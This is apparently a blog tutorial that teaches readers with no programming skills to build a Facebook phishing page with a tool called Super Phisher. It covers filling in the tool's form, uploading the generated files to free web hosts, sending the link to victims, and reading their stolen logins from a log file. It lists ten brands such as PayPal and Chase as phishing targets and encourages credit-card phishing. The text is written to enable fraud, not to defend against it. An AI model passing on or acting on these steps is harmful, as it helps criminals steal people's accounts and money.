I can’t include the download link here for obvious reasons. After downloading the Super Phisher, extract the files and launch Super Phisher.

Complete the Super Phisher Form

Enter https://www.facebook.com in the URL of Login Page section.
For Name of Log File, you can input any name (name.txt) that you will remember (it is where the logins will be saved).
Use the PHP file name for the Name of PHP File section.
Enter https://www.facebook.com in Site to Redirect To.
Click Build Phisher. Clicking the Build Phisher will generate two output files in the output folder.

Create a Webhosting Account

You need to host the files with web hosts that support FTP. I recommend hosting services like t35.com and byethost.com. You can also search for free host services if you don’t want to spend it. Also, note that free hosting makes your phishing website slow and unstable.
Note: If you do not know how to create a web hosting account, you can send me a request email for a hosting account.

Host the Phishing Files

Go to Super Phisher and upload the two files you find there to your webhost. Make sure to upload both files to public_html.
From there, you can look for your phishing page URL. If you can’t find the URL, copy the source code in HTML file and paste in www.htmlpasta.com. Complete the reCAPTCHA challenge, and you will see your URL.
Share the phishing link with people you want to phish. Once they use the link to login to Facebook, their login details will be saved to your web account. Navigate to Log.txt file in your hosting account and retrieve the Facebook login details.

Top 10 Websites to Use for Phishing

  • Netflix
  • Chase
  • Yahoo
  • Facebook
  • PayPal
  • Apple
  • Microsoft
  • Amazon
  • eBay
  • WhatsApp
NOTE
I do not include download links in my articles for obvious reasons.

Conclusion

So, here is all regarding how to create a phishing page step by step. The exciting thing is that I have painstakingly explained this guide for those without any programming skills. I bet you can’t find any better guide out there unless you wish to spend your data.


If you find it difficult to follow up, then hire a web developer to do the job. But like I mentioned earlier, it is unsafe to hire a developer for your phishing website. Lest I forget, you can also create a phishing e-commerce website to phish credit card details. However, that’s a story for another day.
Phish Safely…
Don't read for just yourself, share with your friends - because you love them. Please!!!
Join other Hustlers in LearningDon't Miss Out